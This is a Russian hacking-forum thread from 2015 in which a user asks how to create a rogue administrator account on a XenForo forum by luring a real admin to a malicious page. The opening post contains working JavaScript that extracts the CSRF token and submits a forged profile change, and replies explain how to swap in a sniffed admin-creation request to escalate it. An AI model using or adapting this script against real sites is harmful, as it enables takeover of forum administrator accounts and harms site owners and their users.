Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Как это решить? (https://forum.antichat.xyz/showthread.php?t=427835)

Lonely Man 17.07.2015 12:20
Доброе время суток. В поисках ответа на свой порос я пришел к Вам, так-как тут говорят что есть знающие люди. Суть вопроса такова: как создать новую учетную запись администратора на XenForo через подмену куки реального администратора методом редиректов на страницу с вредоносным кодом?

Вдохновился статьей одного из модераторов yarbabin где он показывал как обычным редиректом на страницу с вредоносным кодом можно было изменять подписи.

Код HTML:
$(document).ready(function pwn() {
$(document.body).hide();
$('html').css('background-color','#fff');
var getcsrf = document.body.innerHTML;
var re = new RegExp('_csrfToken: "(.*)"', 'ig');
token = re.exec(getcsrf)[1];
var xhr = new XMLHttpRequest();
var body = 'about_html=%3Cp%3EPWNED+BY+%3Ca+href%3D%22https%3A%2F%2Fbhf.su%2Fmembers%2F71790%2F%22+class%3D%22internalLink+ProxyLink%22+data-proxy-href%3D%22https%3A%2F%2Fbhf.su%2Fmembers%2F71790%2F%22%3EYARBABIN%3C%2Fa%3E%3C%2Fp%3E%0D%0A&_xfRelativeResolver=https%3A%2F%2Fbhf.su%2Faccount%2Fpersonal-details&save=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C+%D0%B8%D0%B7%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F&_xfRequestUri=%2Faccount%2Fpersonal-details&_xfNoRedirect=1&_xfToken=' + encodeURIComponent(token) + '&_xfResponseType=json';
xhr.open("POST", '/account/personal-details-save', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send(body);
document.location.href='https://yarbabin.ru/dorkgen/dorkgen.php';
});
Есть-ли люди знающие как реализовать данную затею?

faza02 17.07.2015 12:33
так отснифайте запрос который отправляется при создании нового админа и воткните его в переменную body

ocheretko 17.07.2015 12:38
Цитата:
Сообщение от None
через подмену куки реального администратора
Я бы написал не через подмену куки, а через выполнение javascript кода в контексте атакуемого домена.

Lonely Man 17.07.2015 12:40
Цитата:
Сообщение от ocheretko

Я бы написал не через подмену куки, а через выполнение javascript кода в контексте атакуемого домена.
Если можете можно навести пример кода. В JavaScript пока что понимаю лишь азы не более.

ocheretko 17.07.2015 15:27
Пример кода написан у Вас в первом сообщении, Вы просто меня не правильно поняли.

Вам нужно перехватить сниффером запрос добавления новой учетной записи, и эти данные подставить в код из первого сообщения. Естественно для этого установите себе этот движок (XenForo) на локальный компьютер, или Ваш хостинг. Сниффер выбирайте какой Вам больше нравится. Я пользуюсь HTTPAnalyzer.

var body = ' - параметры и значения POST запроса

xhr.open("POST", ' - адрес скрипта на удаленном сервере, куда отсылать POST


Время: 10:18